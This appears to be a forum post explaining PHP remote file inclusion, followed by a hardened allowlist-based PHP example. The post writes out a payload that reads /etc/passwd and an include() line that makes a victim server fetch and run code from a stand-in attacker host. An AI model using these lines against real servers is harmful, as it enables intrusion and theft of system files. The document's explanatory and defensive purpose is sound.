To further clarify how include(...) can harm your own server...
I can upload a file to my webserver called crack.txt that contains the following:
<?php
readfile("/etc/passwd");
?>
Notice that this is a .txt file - my web server won't execute the PHP code contained in the file.
Now if I can make YOUR web server run the code
include("http://www.mywebserver.com/crack.txt");
Then YOUR web server will show me its /etc/passwd file. Of course I could have done almost anything else in my source code - delete files, run other programs, etc - almost anything that the web server's user account has permissions to do.
Clancy.
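The defensive counterpart to the scenario above, as an added example that is not part of Clancy's post: instead of passing user input to include(), map a request parameter onto a fixed allowlist of local files and refuse anything else. The ./pages/ directory, the page names and the $_GET['page'] parameter are assumptions for illustration.

```php
<?php
// Added example: a hardened replacement for include($_GET['page']).
// Assumes a local directory ./pages/ holding the permitted files.
// Also set allow_url_include = Off in php.ini so that include() cannot
// fetch remote URLs at all, regardless of application bugs.

declare(strict_types=1);

// Only these logical names may be included; map name => file on disk.
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Resolve a user-supplied page name to an allowlisted local file path,
 * or return null when the request is not permitted.
 */
function resolvePage(string $requested, string $baseDir): ?string
{
    // Reject anything that is not an exact allowlist key: URLs, "../",
    // null bytes and so on never reach the filesystem.
    if (!array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . ALLOWED_PAGES[$requested]);
    // realpath() returns false if the file does not exist; additionally
    // confirm the resolved path still lies inside $baseDir (defence in depth).
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Vulnerable pattern, for contrast (do not use):
//   include($_GET['page']);
// With allow_url_include enabled, a remote file like the crack.txt above
// would be fetched and executed with the web server's privileges.

$requested = $_GET['page'] ?? 'home';
$file = resolvePage($requested, __DIR__ . '/pages');
if ($file === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $file;
```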